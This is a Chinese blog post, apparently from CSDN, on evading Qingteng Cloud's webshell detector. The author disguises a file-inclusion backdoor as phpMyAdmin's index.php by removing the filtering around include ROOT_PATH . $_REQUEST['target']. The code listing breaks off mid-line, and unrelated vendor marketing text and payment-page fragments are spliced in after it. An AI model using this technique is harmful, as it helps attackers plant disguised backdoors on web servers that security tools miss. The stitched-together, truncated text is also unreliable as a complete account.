青藤云Webshell查杀绕过

本文介绍了作者如何通过修改开源程序并插入一句话后门成功绕过青藤云的Webshell检测。作者首先发现青藤云的检测机制可能基于深度学习的有监督方式,然后选择了一个经过过滤和判断处理的Phpmyadmin文件,修改为包含任意文件并保留部分源码。测试结果显示绕过成功,但同时也注意到存在误报问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

上周看到一些朋友在发青藤云的聊天记录,绕过一个发200块红包。周末的时候就简单做了个测试。
首先使用绕过D盾的webshell,发现被标记为恶意。这就有点意思了。我去看了一下聊天记录的内容,看原理是采用的深度学习的方式。猜测是有监督的方式来实现的(仅为猜测)。我这里绕过的思路采用的是,使用开源程序进行修改,带入一句话后门代码。

记得Phpmyadmin的index.php文件中包含有include ROOT_PATH . $_REQUEST['target'];这样的代码,如果不看上下文,这个妥妥的文件包含漏洞。不过上文有过滤和判断处理,导致无法包含任意文件。我将其修改为包含任意文件。同时保留来一些源码,把影响执行的代码注释掉(因为适应多种环境,适用但文件的情况)。
最终修改的代码如下:

<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Main loader script
 *
 * @package PhpMyAdmin
 */
declare(strict_types=1);
/*
use PhpMyAdmin\Controllers\HomeController;
use PhpMyAdmin\Core;
use PhpMyAdmin\DatabaseInterface;
use PhpMyAdmin\Response;
use PhpMyAdmin\Url;
use PhpMyAdmin\Util;
*/
if (! defined('ROOT_PATH')) {
    define('ROOT_PATH', '');   //这里做了修改,不影响后门包
青藤专注于服务端主机的安全防护,提供持续的安全监控、分析和快速响应能力,能够在 公有云、私有云、混合云、物理机、虚拟机等各种业务环境下实现安全的统一策略管理和快速 的入侵响应能力。 青藤的产品可以很方便地和各种云平台及传统服务器结合,能够在全球范围内轻易部署。 使用产品不需要购买硬件,不需要复杂的配置,学习成本低,但精确度极高。青藤的产品向企 业的运维和安全人员提供了安全管理海量服务器的能力,使得用户在降低成本、缺乏安全专业 知识的前提下,也能极大地提高企业的安全防护能力。 青藤采用的 Adaptive Security 架构是 Gartner 提出的面向未来十年的企业安全架构,能够 在复杂和变化的环境下有效抵御高级攻击,是整个安全行业的发展方向。其创新之处在于:一 方面将安全视角转移到防火墙之后的业务系统内部,强调基于业务、自内而外地构建安全体 系,另一方面将安全从传统的安全事件防护变成一项持续安全响应和处理过程,从多个维度持 续地保护了企业安全。 安全是一个持续化的过程,青藤产品有快速、灵活、可扩展的特点,可以将现有的安全技 术与持续运营的安全模型相结合,给用户提供一个持续化的动态安全解决方案。青藤产品提供 统一安全管理平台,统一的安全框架和灵活的社区交互能力,将安全的价值最大化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值